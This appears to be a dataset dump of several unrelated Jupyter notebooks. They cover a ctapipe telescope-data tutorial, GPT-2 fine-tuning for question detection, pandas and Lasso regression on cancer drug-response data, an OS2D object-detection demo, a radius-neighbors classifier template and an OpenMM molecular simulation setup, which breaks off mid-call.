code
stringlengths 2.5k
150k
| kind
stringclasses 1
value |
|---|---|
# Getting Started with ctapipe
This hands-on was presented at the Paris CTA Consoritum meeting (K. Kosack)
## Part 1: load and loop over data
```
from ctapipe.io import event_source
from ctapipe import utils
from matplotlib import pyplot as plt
%matplotlib inline
path = utils.get_dataset_path("gamma_test_large.simtel.gz")
for event in event_source(path, max_events=4):
print(event.count, event.r0.event_id, event.mc.energy)
event
event.r0
for event in event_source(path, max_events=4):
print(event.count, event.r0.tels_with_data)
event.r0.tel[2]
r0tel = event.r0.tel[2]
r0tel.waveform
r0tel.waveform.shape
```
note that this is ($N_{channels}$, $N_{pixels}$, $N_{samples}$)
```
plt.pcolormesh(r0tel.waveform[0])
plt.plot(r0tel.waveform[0,10])
from ipywidgets import interact
@interact
def view_waveform(chan=0, pix_id=200):
plt.plot(r0tel.waveform[chan, pix_id])
```
try making this compare 2 waveforms
## Part 2: Explore the instrument description
This is all well and good, but we don't really know what camera or telescope this is... how do we get instrumental description info?
Currently this is returned *inside* the event (it will soon change to be separate in next version or so)
```
subarray = event.inst.subarray # soon EventSource will give you event, subarray separate
subarray
subarray.peek()
subarray.to_table()
subarray.tel[2]
subarray.tel[2].camera
subarray.tel[2].optics
tel = subarray.tel[2]
tel.camera
tel.optics
tel.camera.geometry.pix_x
tel.camera.geometry.to_table()
tel.optics.mirror_area
from ctapipe.visualization import CameraDisplay
disp = CameraDisplay(tel.camera.geometry)
disp = CameraDisplay(tel.camera.geometry)
disp.image = r0tel.waveform[0,:,10] # display channel 0, sample 0 (try others like 10)
```
** aside: ** show demo using a CameraDisplay in interactive mode in ipython rather than notebook
## Part 3: Apply some calibration and trace integration
```
from ctapipe.calib import CameraCalibrator
calib = CameraCalibrator(subarray=subarray)
for event in event_source(path, max_events=4):
calib(event) # fills in r1, dl0, and dl1
print(event.dl1.tel.keys())
event.dl1.tel[2]
dl1tel = event.dl1.tel[2]
dl1tel.image.shape # note this will be gain-selected in next version, so will be just 1D array of 1855
dl1tel.pulse_time
CameraDisplay(tel.camera.geometry, image=dl1tel.image)
CameraDisplay(tel.camera.geometry, image=dl1tel.pulse_time)
```
Now for Hillas Parameters
```
from ctapipe.image import hillas_parameters, tailcuts_clean
image = dl1tel.image
mask = tailcuts_clean(tel.camera.geometry, image, picture_thresh=10, boundary_thresh=5)
mask
CameraDisplay(tel.camera.geometry, image=mask)
cleaned = image.copy()
cleaned[~mask] = 0
disp = CameraDisplay(tel.camera.geometry, image=cleaned)
disp.cmap = plt.cm.coolwarm
disp.add_colorbar()
plt.xlim(-1.0,0)
plt.ylim(0,1.0)
params = hillas_parameters(tel.camera.geometry, cleaned)
print(params)
disp = CameraDisplay(tel.camera.geometry, image=cleaned)
disp.cmap = plt.cm.coolwarm
disp.add_colorbar()
plt.xlim(-1.0,0)
plt.ylim(0,1.0)
disp.overlay_moments(params, color='white', lw=2)
```
## Part 4: Let's put it all together:
- loop over events, selecting only telescopes of the same type (e.g. LST:LSTCam)
- for each event, apply calibration/trace integration
- calculate Hillas parameters
- write out all hillas paremeters to a file that can be loaded with Pandas
first let's select only those telescopes with LST:LSTCam
```
subarray.telescope_types
subarray.get_tel_ids_for_type("LST_LST_LSTCam")
```
Now let's write out program
```
data = utils.get_dataset_path("gamma_test_large.simtel.gz")
source = event_source(data, allowed_tels=[1,2,3,4], max_events=10) # remove the max_events limit to get more stats
for event in source:
calib(event)
for tel_id, tel_data in event.dl1.tel.items():
tel = event.inst.subarray.tel[tel_id]
mask = tailcuts_clean(tel.camera.geometry, tel_data.image)
params = hillas_parameters(tel.camera.geometry[mask], tel_data.image[mask])
from ctapipe.io import HDF5TableWriter
with HDF5TableWriter(filename='hillas.h5', group_name='dl1', overwrite=True) as writer:
for event in event_source(data, allowed_tels=[1,2,3,4], max_events=10):
calib(event)
for tel_id, tel_data in event.dl1.tel.items():
tel = event.inst.subarray.tel[tel_id]
mask = tailcuts_clean(tel.camera.geometry, tel_data.image)
params = hillas_parameters(tel.camera.geometry[mask], tel_data.image[mask])
writer.write("hillas", params)
```
### We can now load in the file we created and plot it
```
!ls *.h5
import pandas as pd
hillas = pd.read_hdf("hillas.h5", key='/dl1/hillas')
hillas
_ = hillas.hist(figsize=(8,8))
```
If you do this yourself, loop over more events to get better statistics
|
github_jupyter
|
<a href="https://colab.research.google.com/github/daveshap/QuestionDetector/blob/main/QuestionDetector.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Compile Training Data
Note: Generate the raw data with [this notebook](https://github.com/daveshap/QuestionDetector/blob/main/DownloadGutenbergTop100.ipynb)
```
import re
import random
datafile = '/content/drive/My Drive/Gutenberg/sentence_data.txt'
corpusfile = '/content/drive/My Drive/Gutenberg/corpus_data.txt'
testfile = '/content/drive/My Drive/Gutenberg/test_data.txt'
sample_cnt = 3000
test_cnt = 30
questions = list()
exclamations = list()
other = list()
with open(datafile, 'r', encoding='utf-8') as infile:
body = infile.read()
sentences = re.split('\n\n', body)
for i in sentences:
if 'í' in i or 'á' in i:
continue
if '?' in i:
questions.append(i)
elif '!' in i:
exclamations.append(i)
else:
other.append(i)
def flatten_sentence(text):
text = text.lower()
fa = re.findall('[\w\s]',text)
return ''.join(fa)
def compose_corpus(data, count, label):
result = ''
random.seed()
subset = random.sample(data, count)
for i in subset:
result += '<|SENTENCE|> %s <|LABEL|> %s <|END|>\n\n' % (flatten_sentence(i), label)
return result
corpus = compose_corpus(questions, sample_cnt, 'question')
corpus += compose_corpus(exclamations, sample_cnt, 'other')
corpus += compose_corpus(other, sample_cnt, 'other')
with open(corpusfile, 'w', encoding='utf-8') as outfile:
outfile.write(corpus)
print('Done!', corpusfile)
corpus = compose_corpus(questions, test_cnt, 'question')
corpus += compose_corpus(exclamations, test_cnt, 'other')
corpus += compose_corpus(other, test_cnt, 'other')
with open(testfile, 'w', encoding='utf-8') as outfile:
outfile.write(corpus)
print('Done!', testfile)
```
# Finetune Model
Finetune GPT-2
```
!pip install tensorflow-gpu==1.15.0 --quiet
!pip install gpt-2-simple --quiet
import gpt_2_simple as gpt2
# note: manually mount your google drive in the file explorer to the left
model_dir = '/content/drive/My Drive/GPT2/models'
checkpoint_dir = '/content/drive/My Drive/GPT2/checkpoint'
#model_name = '124M'
model_name = '355M'
#model_name = '774M'
gpt2.download_gpt2(model_name=model_name, model_dir=model_dir)
print('\n\nModel is ready!')
run_name = 'QuestionDetector'
step_cnt = 4000
sess = gpt2.start_tf_sess()
gpt2.finetune(sess,
dataset=corpusfile,
model_name=model_name,
model_dir=model_dir,
checkpoint_dir=checkpoint_dir,
steps=step_cnt,
restore_from='fresh', # start from scratch
#restore_from='latest', # continue from last work
run_name=run_name,
print_every=50,
sample_every=1000,
save_every=1000
)
```
# Test Results
| Run | Model | Steps | Samples | Last Loss | Avg Loss | Accuracy |
|---|---|---|---|---|---|---|
| 01 | 124M | 2000 | 9000 | 0.07 | 0.69 | 71.4% |
| 02 | 355M | 2000 | 9000 | 0.24 | 1.63 | 66% |
| 03 | 355M | 4000 | 9000 | 0.06 | 0.83 | 58% |
| 04 | 355M | 4000 | 9000 | 0.11 | 0.68 | 74.4% |
Larger models seem to need more steps and/or data. Seems to perform very high on questions and less good on others. Test 04 was reduced to 2 classes.
```
right = 0
wrong = 0
print('Loading test set...')
with open(testfile, 'r', encoding='utf-8') as file:
test_set = file.readlines()
for t in test_set:
t = t.strip()
if t == '':
continue
prompt = t.split('<|LABEL|>')[0] + '<|LABEL|>'
expect = t.split('<|LABEL|>')[1].replace('<|END|>', '').strip()
#print('\nPROMPT:', prompt)
response = gpt2.generate(sess,
return_as_list=True,
length=30, # prevent it from going too crazy
prefix=prompt,
model_name=model_name,
model_dir=model_dir,
truncate='\n', # stop inferring here
include_prefix=False,
checkpoint_dir=checkpoint_dir,)[0]
response = response.strip()
if expect in response:
right += 1
else:
wrong += 1
print('right:', right, '\twrong:', wrong, '\taccuracy:', right / (right+wrong))
#print('RESPONSE:', response)
print('\n\nModel:', model_name)
print('Samples:', max_samples)
print('Steps:', step_cnt)
```
|
github_jupyter
|
# Preliminaries
The `pandas` library allows the user several data structures for different data manipulation tasks:
1. Data storage through its `Series` and `DataFrame` data structures.
2. Data filtering using multiple methods from the package.
3. Reading data from many different file formats such as `csv`, `txt`, `xlsx`, ...
Below we provide a brief overview of the `pandas` functionalities needed for these exercises. The complete documentation can be found on the [`pandas` website](https://pandas.pydata.org/).
## Pandas data structures
### Series
The Pandas Series data structure is similar to a one-dimensional array. It can store any type of data. The values are mutable but the size not.
To create `Series`, we call the `pd.Series()` method and pass an array. A `Series` may also be created from a numpy array.
```
import pandas as pd
import numpy as np
first_series = pd.Series([1,10,100,1000])
print(first_series)
teams = np.array(['PSV','Ajax','Feyenoord','Twente'])
second_series = pd.Series(teams)
print('\n')
print(second_series)
```
### DataFrame
One can think of a `DataFrame` as a table with rows and columns (2D structure). The columns can be of a different type (as opposed to `numpy` arrays) and the size of the `DataFrame` is mutable.
To create `DataFrame`, we call the `pd.DataFrame()` method and we can create it from scratch or we can convert a numpy array or a list into a `DataFrame`.
```
# DataFrame from scratch
first_dataframe = pd.DataFrame({
"Position": [1, 2, 3, 4],
"Team": ['PSV','Ajax','Feyenoord','Twente'],
"GF": [80, 75, 75, 70],
"GA": [30, 25, 40, 60],
"Points": [79, 78, 70, 66]
})
print("From scratch: \n {} \n".format(first_dataframe))
# DataFrme from a list
data = [[1, 2, 3, 4], ['PSV','Ajax','Feyenoord','Twente'],
[80, 75, 75, 70], [30, 25, 40, 60], [79, 78, 70, 66]]
columns = ["Position", "Team", "GF", "GA", "Points"]
second_dataframe = pd.DataFrame(data, index=columns)
print("From list: \n {} \n".format(second_dataframe.T)) # the '.T' operator is explained later on
# DataFrame from numpy array
data = np.array([[1, 2, 3, 4], ['PSV','Ajax','Feyenoord','Twente'],
[80, 75, 75, 70], [30, 25, 40, 60], [79, 78, 70, 66]])
columns = ["Position", "Team", "GF", "GA", "Points"]
third_dataframe = pd.DataFrame(data.T, columns=columns)
print("From numpy array: \n {} \n".format(third_dataframe))
```
### DataFrame attributes
This section gives a quick overview of some of the `pandas.DataFrame` attributes such as `T`, `index`, `columns`, `iloc`, `loc`, `shape` and `values`.
```
# transpose the index and columns
print(third_dataframe.T)
# index makes reference to the row labels
print(third_dataframe.index)
# columns makes reference to the column labels
print(third_dataframe.columns)
# iloc allows to access the index by integer-location (e.g. all team names, which are in the second columm)
print(third_dataframe.iloc[:,1])
# loc allows to access the index by label(s)-location (e.g. all team names, which are in the "Team" columm)
print(third_dataframe.loc[0, 'Team'])
# shape returns a tuple with the DataFrame dimension, similar to numpy
print(third_dataframe.shape)
# values return a Numpy representation of the DataFrame data
print(third_dataframe.values)
```
### DataFrame methods
This section gives a quick overview of some of the `pandas.DataFrame` methods such as `head`, `describe`, `concat`, `groupby`,`rename`, `filter`, `drop` and `isna`. To import data from CSV or MS Excel files, we can make use of `read_csv` and `read_excel`, respectively.
```
# print the first few rows in your dataset with head()
print(third_dataframe.head()) # In this case, it is not very useful because we don't have thousands of rows
# get the summary statistics of the DataFrame with describe()
print(third_dataframe.describe())
# concatenate (join) DataFrame objects using concat()
# first, we will split the above DataFrame in two different ones
df_a = third_dataframe.loc[[0,1],:]
df_b = third_dataframe.loc[[2,3],:]
print(df_a)
print('\n')
print(df_b)
print('\n')
# now, we concatenate both datasets
df = pd.concat([df_a, df_b])
print(df)
# group the data by certain variable via groupby()
# here, we have grouped the data by goals for, which in this case is 75
group = df.groupby('GF')
print(group.get_group('75'))
# rename() helps you change the column or index names
print(df.rename(columns={'Position':'Pos','Team':'Club'}))
# build a subset of rows or columns of your dataset according to labels via filter()
# here, items refer to the variable names: 'Team' and 'Points'; to select columns, we specify axis=1
print(df.filter(items=['Team', 'Points'], axis=1))
# dropping some labels
print(df.drop(columns=['GF', 'GA']))
# search for NA (not available) entries in the DataFrame
print(df.isna()) # No NA values
print('\n')
# create a pandas Series with a NA value
# the Series as W (winnin matches)
tmp = pd.Series([np.NaN, 25, 24, 19], name="W")
# concatenate the Series with the DataFrame
df = pd.concat([df,tmp], axis = 1)
print(df)
print('\n')
# again, check for NA entries
print(df.isna())
```
## Dataset
For this week exercises we will use a dataset from the Genomics of Drug Sensitivity in Cancer (GDSC) project (https://www.cancerrxgene.org/). In this study (['Iorio et al., Cell, 2016']()), 265 compounds were tested on 1001 cancer cell lines for which different types of -omics data (RNA expression, DNA methylation, Copy Number Alteration, DNA sequencing) are available. This is a valuable resource to look for biomarkers of drugs sensitivity in order to try to understand why cancer patients responds very differently to cancer drugs and find ways to assign the optimal treatment to each patient.
For this exercise we will use a subset of the data, focusing the response to the drug YM155 (Sepantronium bromide) on four cancer types, for a total of 148 cancer cell lines.
| ID | Cancer type |
|-------------|----------------------------------|
| COAD/READ | Colorectal adenocarcinoma |
| NB | Neuroblastoma |
| KIRC | Kidney renal clear cell carcinoma|
| BRCA | Breast carcinoma |
We will use the RNA expression data (RMA normalised). Only genes with high variability across cell lines (variance > 5, resulting in 238 genes) have been kept.
Drugs have been tested at different concentration, measuring each time the viability of the cells. Drug sensitivity is measured using the natural log of the fitted IC50 metric, which is defined as the half maximal inhibitory concentration. A lower IC50 corresponds to a more sensitive cell line because a lower amount of drug is sufficient to have a strong response, while a higher IC50 corresponds to a more resistant cell line because more drug is needed for killing the cells.
Based on the IC50 metric, cells can be classified as sensitive or resistant. The classification is done by computing the $z$-score across all cell lines in the GDSC for each drug, and considering as sensitive the ones with $z$-score < 0 and resistant the ones with $z$-score > 0.
The dataset is originally provided as 3 files ([original source](https://www.sciencedirect.com/science/article/pii/S0092867416307462?via%3Dihub)) :
`GDSC_RNA_expression.csv`: gene expression matrix with the cell lines in the rows (148) and the genes in the columns (238).
`GDSC_drug_response.csv`: vector with the cell lines response to the drug YM155 in terms of log(IC50) and as classification in sensitive or resistant.
`GDSC_metadata.csv`: metadata for the 148 cell lines including name, COSMIC ID and tumor type (using the classification from ['The Cancer Genome Atlas TCGA'](https://www.cancer.gov/about-nci/organization/ccg/research/structural-genomics/tcga))
For convenience, we provide the data already curated.
`RNA_expression_curated.csv`: [148 cell lines , 238 genes]
`drug_response_curated.csv`: [148 cell lines , YM155 drug]
The curated data cam be read as `pandas` `DataFrame`s in the following way:
```
import pandas as pd
gene_expression = pd.read_csv("./data/RNA_expression_curated.csv", sep=',', header=0, index_col=0)
drug_response = pd.read_csv("./data/drug_response_curated.csv", sep=',', header=0, index_col=0)
```
You can use the `DataFrame`s directly as inputs to the the `sklearn` models. The advantage over using `numpy` arrays is that the variable are annotated, i.e. each input and output has a name.
## Tools
The `scikit-learn` library provides the required tools for linear regression/classification and shrinkage, as well as for logistic regression.
```
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge
from sklearn.linear_model import Lasso
from sklearn.linear_model import LogisticRegression
```
Note that the notation used for the hyperparameters in the `scikit-learn` library is different from the one used in the lecture. More specifically, in the lecture $\alpha$ is the tunable parameter to select the compromise between Ridge and Lasso. Whereas, `scikit-learn` library refers to `alpha` as the tunable parameter $\lambda$. Please check the documentation for more details.
# Exercises
## Selection of the hyperparameter
Implement cross-validation (using `sklearn.grid_search.GridSearchCV`) to select the `alpha` hyperparameter of `sklearn.linear_model.Lasso`.
## Feature selection
Look at the features selected using the hyperparameter which corresponds to the minimum cross-validation error.
<p><font color='#770a0a'>Is the partition in training and validation sets playing a role in the selection of the hyperparameter? How will this affect the selection of the relevant features?</font></p>
**Answer**: The partition in itself has no direct relation to the selection of the hyperparameter (see the graph with selection frequency), as these partitions are averaged in the hyperparameter selection. Nevertheless, the selected features may be sensitive to this partition. Therefore, it is useful to repeat cross-validation multiple times (using bootstrap).
<p><font color='#770a0a'>Should the value of the intercept also be shrunk to zero with Lasso and Ridge regression? Motivate your answer.</font></p>
**Answer**: No, this should not be done, because then the optimization procedure would become dependent on the origin chosen for the output variable $\mathbf{y}$. For example, adding a constant value to your training $\mathbf{y}$, would not result in an addition of this constant value for the predictions. This would be the case for a non-penalized intercept.
## Bias-variance
Show the effect of the regularization on the parameter estimates in terms of bias and variance. For this you can repeat the optimization 100 times using bootstrap and visualise the profile of the Lasso regression coefficient over a grid of the hyperparameter, optionally including the variability as error bars.
<p><font color='#770a0a'>Based on the visual analysis of the plot, what are your observation on bias and variance in relation to model complexity? Motivate your answer.</font></p>
**Answer**: For a low $\alpha$, many parameters are included, leading to a complex model with high variance. As $\alpha$ increases, the amount and values of the parameters decrease, leading to a less complex model. A less and less complex model increases the bias, but decreases the variance.
## Logistic regression
<p><font color='#770a0a'>Write the expression of the objective function for the penalized logistic regression with $L_1$ and $L_2$ regularisation (as in Elastic net).</font></p>
**Logistic Regression with Elastic net**
$$\max_{\beta_0, \beta} \left\{ \sum^{N}_{i=1} \left[y_i\left(\beta_0 + \beta^T x_i\right) - \log{\left(1+e^{\beta_0 + \beta^T x_i}\right)}\right]-\left[\lambda_1 \sum_{j=1}^{p} |\beta_j | + \lambda_2 \sum_{j=1}^{p} \beta_j^2 \right] \right\}$$
**Selection of the Hyperparameter $\alpha$**
```
import sys
sys.path.append('code/')
from week_3_utils import *
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
X_train, X_test, y_train, y_test = train_test_split(gene_expression, drug_response, test_size=0.2, random_state=40)
alpha_range = np.linspace(10e-4,1,num=100)
model = cv_lasso(alpha_range,folds=5)
model.fit(X_train, y_train)
print(model.best_estimator_)
```
**Feature Selection**
```
features = gene_expression.columns
counter = np.zeros((1,len(features)))
amt_of_rep = 5
for ix in range(amt_of_rep):
alpha_range = np.linspace(10e-4,1,num=50)
model = cv_lasso(alpha_range,folds=5)
model.fit(X_train, y_train)
coefficients = model.best_estimator_.named_steps['lasso'].coef_
nonzero_coef = np.array((coefficients != 0.)).astype(int)
counter = counter+nonzero_coef
print(f'{ix} of {amt_of_rep-1}')
counter = counter.ravel()
features_in_plot = features[counter != 0]
counters_in_plot = counter[counter != 0]
#print(features_in_plot)
plt.bar(list(range(0,4*len(features_in_plot),4)), counters_in_plot/amt_of_rep, tick_label=features_in_plot)
plt.xticks(rotation=30)
plt.ylabel('Fraction of Selection')
plt.show()
```
**Bias-Variance**
```
from sklearn.utils import resample
from week_3_utils import lasso_estimator
n_bootstrap = 100
samplesize = 80
alpha_range = np.linspace(0,3,num=100)
coef = np.zeros((len(alpha_range),n_bootstrap,len(gene_expression.columns)))
for j in range(n_bootstrap):
x_bs, y_bs = resample(X_train, y_train, replace=True, n_samples=samplesize)
for i,alpha in enumerate(alpha_range):
model_bs = lasso_estimator(alpha=alpha)
model_bs.fit(x_bs, y_bs)
coef[i,j,:] = model_bs.named_steps['lasso'].coef_
average_coef = np.mean(coef, axis=1)
std_coef = np.std(coef, axis=1)
for k in range(len(gene_expression.columns)):
plt.plot(alpha_range, average_coef[:,k],linewidth=0.5)
plt.xlabel('alpha')
plt.ylabel('Coefficients')
plt.show()
```
|
github_jupyter
|
This is a demo illustrating an application of the OS2D method on one image.
Demo assumes the OS2D code is [installed](./INSTALL.md).
```
import os
import argparse
import matplotlib.pyplot as plt
import torch
import torchvision.transforms as transforms
from os2d.modeling.model import build_os2d_from_config
from os2d.config import cfg
import os2d.utils.visualization as visualizer
from os2d.structures.feature_map import FeatureMapSize
from os2d.utils import setup_logger, read_image, get_image_size_after_resize_preserving_aspect_ratio
logger = setup_logger("OS2D")
# use GPU if have available
cfg.is_cuda = torch.cuda.is_available()
```
Download the trained model (is the script does not work download from [Google Drive](https://drive.google.com/open?id=1l_aanrxHj14d_QkCpein8wFmainNAzo8) and put to models/os2d_v2-train.pth). See [README](./README.md) to get links for other released models.
```
!./os2d/utils/wget_gdrive.sh models/os2d_v2-train.pth 1l_aanrxHj14d_QkCpein8wFmainNAzo8
cfg.init.model = "models/os2d_v2-train.pth"
net, box_coder, criterion, img_normalization, optimizer_state = build_os2d_from_config(cfg)
```
Get the image where to detect and two class images.
```
input_image = read_image("data/demo/input_image.jpg")
class_images = [read_image("data/demo/class_image_0.jpg"),
read_image("data/demo/class_image_1.jpg")]
class_ids = [0, 1]
```
Use torchvision to convert images to torch.Tensor and to apply normalization.
```
transform_image = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(img_normalization["mean"], img_normalization["std"])
])
```
Prepare the input image
```
h, w = get_image_size_after_resize_preserving_aspect_ratio(h=input_image.size[1],
w=input_image.size[0],
target_size=1500)
input_image = input_image.resize((w, h))
input_image_th = transform_image(input_image)
input_image_th = input_image_th.unsqueeze(0)
if cfg.is_cuda:
input_image_th = input_image_th.cuda()
```
Prepare the class images
```
class_images_th = []
for class_image in class_images:
h, w = get_image_size_after_resize_preserving_aspect_ratio(h=class_image.size[1],
w=class_image.size[0],
target_size=cfg.model.class_image_size)
class_image = class_image.resize((w, h))
class_image_th = transform_image(class_image)
if cfg.is_cuda:
class_image_th = class_image_th.cuda()
class_images_th.append(class_image_th)
```
Run the network with one command
```
with torch.no_grad():
loc_prediction_batch, class_prediction_batch, _, fm_size, transform_corners_batch = net(images=input_image_th, class_images=class_images_th)
```
Alternatively one can run the stages of the model separatly, which is convenient, e.g., for sharing class feature extraction between many input images.
```
# with torch.no_grad():
# feature_map = net.net_feature_maps(input_image_th)
# class_feature_maps = net.net_label_features(class_images_th)
# class_head = net.os2d_head_creator.create_os2d_head(class_feature_maps)
# loc_prediction_batch, class_prediction_batch, _, fm_size, transform_corners_batch = net(class_head=class_head,
# feature_maps=feature_map)
```
Convert image organized in batches into images organized in pyramid levels. Not needed in the demo, but essential for multiple images in a batch and multiple pyramid levels.
```
image_loc_scores_pyramid = [loc_prediction_batch[0]]
image_class_scores_pyramid = [class_prediction_batch[0]]
img_size_pyramid = [FeatureMapSize(img=input_image_th)]
transform_corners_pyramid = [transform_corners_batch[0]]
```
Decode network outputs into detection boxes
```
boxes = box_coder.decode_pyramid(image_loc_scores_pyramid, image_class_scores_pyramid,
img_size_pyramid, class_ids,
nms_iou_threshold=cfg.eval.nms_iou_threshold,
nms_score_threshold=cfg.eval.nms_score_threshold,
transform_corners_pyramid=transform_corners_pyramid)
# remove some fields to lighten visualization
boxes.remove_field("default_boxes")
# Note that the system outputs the correaltions that lie in the [-1, 1] segment as the detection scores (the higher the better the detection).
scores = boxes.get_field("scores")
```
Show class images
```
figsize = (8, 8)
fig=plt.figure(figsize=figsize)
columns = len(class_images)
for i, class_image in enumerate(class_images):
fig.add_subplot(1, columns, i + 1)
plt.imshow(class_image)
plt.axis('off')
```
Show fixed number of detections that are above a certain threshold. Yellow rectangles show detection boxes. Each box has a class label and the detection scores (the higher the better the detection). Red parallelograms illustrate the affine transformations that align class images to the input image at the location of detection.
```
plt.rcParams["figure.figsize"] = figsize
cfg.visualization.eval.max_detections = 8
cfg.visualization.eval.score_threshold = float("-inf")
visualizer.show_detections(boxes, input_image,
cfg.visualization.eval)
```
|
github_jupyter
|
# RadiusNeighborsClassifier with MinMaxScaler
This Code template is for the Classification task using a simple Radius Neighbor Classifier, with data being scaled by MinMaxScaler. It implements learning based on the number of neighbors within a fixed radius r of each training point, where r is a floating-point value specified by the user.
### Required Packages
```
!pip install imblearn
import warnings
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as se
from imblearn.over_sampling import RandomOverSampler
from sklearn.preprocessing import LabelEncoder, MinMaxScaler
from sklearn.model_selection import train_test_split
from sklearn.neighbors import RadiusNeighborsClassifier
from sklearn.pipeline import make_pipeline
from sklearn.metrics import classification_report,plot_confusion_matrix
warnings.filterwarnings('ignore')
```
### Initialization
Filepath of CSV file
```
#filepath
file_path= ""
```
List of features which are required for model training .
```
#x_values
features=[]
```
Target feature for prediction.
```
#y_value
target=''
```
### Data Fetching
Pandas is an open-source, BSD-licensed library providing high-performance, easy-to-use data manipulation and data analysis tools.
We will use panda's library to read the CSV file using its storage path.And we use the head function to display the initial row or entry.
```
df=pd.read_csv(file_path)
df.head()
```
### Feature Selections
It is the process of reducing the number of input variables when developing a predictive model. Used to reduce the number of input variables to both reduce the computational cost of modelling and, in some cases, to improve the performance of the model.
We will assign all the required input features to X and target/outcome to Y.
```
X = df[features]
Y = df[target]
```
### Data Preprocessing
Since the majority of the machine learning models in the Sklearn library doesn't handle string category data and Null value, we have to explicitly remove or replace null values. The below snippet have functions, which removes the null value if any exists. And convert the string classes data in the datasets by encoding them to integer classes.
```
def NullClearner(df):
if(isinstance(df, pd.Series) and (df.dtype in ["float64","int64"])):
df.fillna(df.mean(),inplace=True)
return df
elif(isinstance(df, pd.Series)):
df.fillna(df.mode()[0],inplace=True)
return df
else:return df
def EncodeX(df):
return pd.get_dummies(df)
def EncodeY(df):
if len(df.unique())<=2:
return df
else:
un_EncodedT=np.sort(pd.unique(df), axis=-1, kind='mergesort')
df=LabelEncoder().fit_transform(df)
EncodedT=[xi for xi in range(len(un_EncodedT))]
print("Encoded Target: {} to {}".format(un_EncodedT,EncodedT))
return df
x=X.columns.to_list()
for i in x:
X[i]=NullClearner(X[i])
X=EncodeX(X)
Y=EncodeY(NullClearner(Y))
X.head()
```
#### Correlation Map
In order to check the correlation between the features, we will plot a correlation matrix. It is effective in summarizing a large amount of data where the goal is to see patterns.
```
f,ax = plt.subplots(figsize=(18, 18))
matrix = np.triu(X.corr())
se.heatmap(X.corr(), annot=True, linewidths=.5, fmt= '.1f',ax=ax, mask=matrix)
plt.show()
```
#### Distribution Of Target Variable
```
plt.figure(figsize = (10,6))
se.countplot(Y)
```
### Data Splitting
The train-test split is a procedure for evaluating the performance of an algorithm. The procedure involves taking a dataset and dividing it into two subsets. The first subset is utilized to fit/train the model. The second subset is used for prediction. The main motive is to estimate the performance of the model on new data.
```
x_train,x_test,y_train,y_test=train_test_split(X,Y,test_size=0.2,random_state=123)
```
#### Handling Target Imbalance
The challenge of working with imbalanced datasets is that most machine learning techniques will ignore, and in turn have poor performance on, the minority class, although typically it is performance on the minority class that is most important.
One approach to addressing imbalanced datasets is to oversample the minority class. The simplest approach involves duplicating examples in the minority class.We will perform overspampling using imblearn library.
```
x_train,y_train = RandomOverSampler(random_state=123).fit_resample(x_train, y_train)
```
### Model
RadiusNeighborsClassifier implements learning based on the number of neighbors within a fixed radius of each training point, where is a floating-point value specified by the user.
In cases where the data is not uniformly sampled, radius-based neighbors classification can be a better choice.
#### Tuning parameters
> **radius**: Range of parameter space to use by default for radius_neighbors queries.
> **algorithm**: Algorithm used to compute the nearest neighbors:
> **leaf_size**: Leaf size passed to BallTree or KDTree.
> **p**: Power parameter for the Minkowski metric.
> **metric**: the distance metric to use for the tree.
> **outlier_label**: label for outlier samples
> **weights**: weight function used in prediction.
For more information refer: [API](https://scikit-learn.org/stable/modules/generated/sklearn.neighbors.RadiusNeighborsClassifier.html)
#### Data Rescaling
MinMaxScaler subtracts the minimum value in the feature and then divides by the range, where range is the difference between the original maximum and original minimum.
```
# Build Model here
model = make_pipeline(MinMaxScaler(),RadiusNeighborsClassifier(n_jobs=-1))
model.fit(x_train, y_train)
```
#### Model Accuracy
score() method return the mean accuracy on the given test data and labels.
In multi-label classification, this is the subset accuracy which is a harsh metric since you require for each sample that each label set be correctly predicted.
```
print("Accuracy score {:.2f} %\n".format(model.score(x_test,y_test)*100))
```
#### Confusion Matrix
A confusion matrix is utilized to understand the performance of the classification model or algorithm in machine learning for a given test set where results are known.
```
plot_confusion_matrix(model,x_test,y_test,cmap=plt.cm.Blues)
```
#### Classification Report
A Classification report is used to measure the quality of predictions from a classification algorithm. How many predictions are True, how many are False.
* **where**:
- Precision:- Accuracy of positive predictions.
- Recall:- Fraction of positives that were correctly identified.
- f1-score:- percent of positive predictions were correct
- support:- Support is the number of actual occurrences of the class in the specified dataset.
```
print(classification_report(y_test,model.predict(x_test)))
```
#### Creator: Viraj Jayant, Github: [Profile](https://github.com/Viraj-Jayant/)
|
github_jupyter
|
# SIMULATE THE SYSTEM
```
import simtk.openmm as mm # Main OpenMM functionality
import simtk.openmm.app as app # Application layer (handy interface)
import simtk.unit as unit # Unit/quantity handling
import mdtraj
import matplotlib as mpl
import matplotlib.pyplot as plt
import os
cwd = cwd = os.getcwd()
solvent_solute_system = os.path.join(cwd, 'files/6a5j_protein/solv.pdb')
molecule = app.PDBFile(solvent_solute_system) # Load the solvated peptide
```
### (a) System object from topology of solvated peptide
```
forcefield = app.ForceField("amber14/protein.ff14SB.xml", "amber14/tip3p.xml")
system = forcefield.createSystem(
molecule.topology,
nonbondedMethod=app.PME, # Non-bonded interactions
nonbondedCutoff=1 * unit.nanometer, # Cut-off of non-bonded interactions
constraints=app.HBonds
)
```
### (b) Simulation using Langevin integrator in timesteps of 2 fs at 300k
```
integrator = mm.LangevinIntegrator(300.*unit.kelvin, 1./unit.picosecond, 2.*unit.femtoseconds)
simulation = app.Simulation(
molecule.topology, # Topology
system, # System
integrator, # Integrator
mm.Platform.getPlatformByName('CPU') # Platform = 'CPU' or 'CUDA'
)
simulation.context.setPositions(molecule.positions) # Add the current atomic positions of the solvated peptide
# to the context of the simulation.
```
### (c) Energy minimization of the system
```
simulation.minimizeEnergy()
state = simulation.context.getState(getPositions=True) # New co-ordinates
molecule.positions = state.getPositions()
minimized_system = os.path.join(cwd, 'files/6a5j_protein/min.pdb')
with open(minimized_system, "w") as file_:
molecule.writeFile(
molecule.topology, molecule.positions,
file=file_
)
# One can visualize this in VMD and see the difference between original and the minimised atoms
```
### (c) Equilibration of system in the NVT ensemble for 100 ps
```
molecule = app.PDBFile(minimized_system)
simulation.context.setPositions(molecule.positions)
run_length = 50000 # 50000 * 2 fs = 100 ps
equilibration_log = os.path.join(cwd, 'files/6a5j_protein/equilibration.log')
simulation.reporters.append(
app.StateDataReporter(
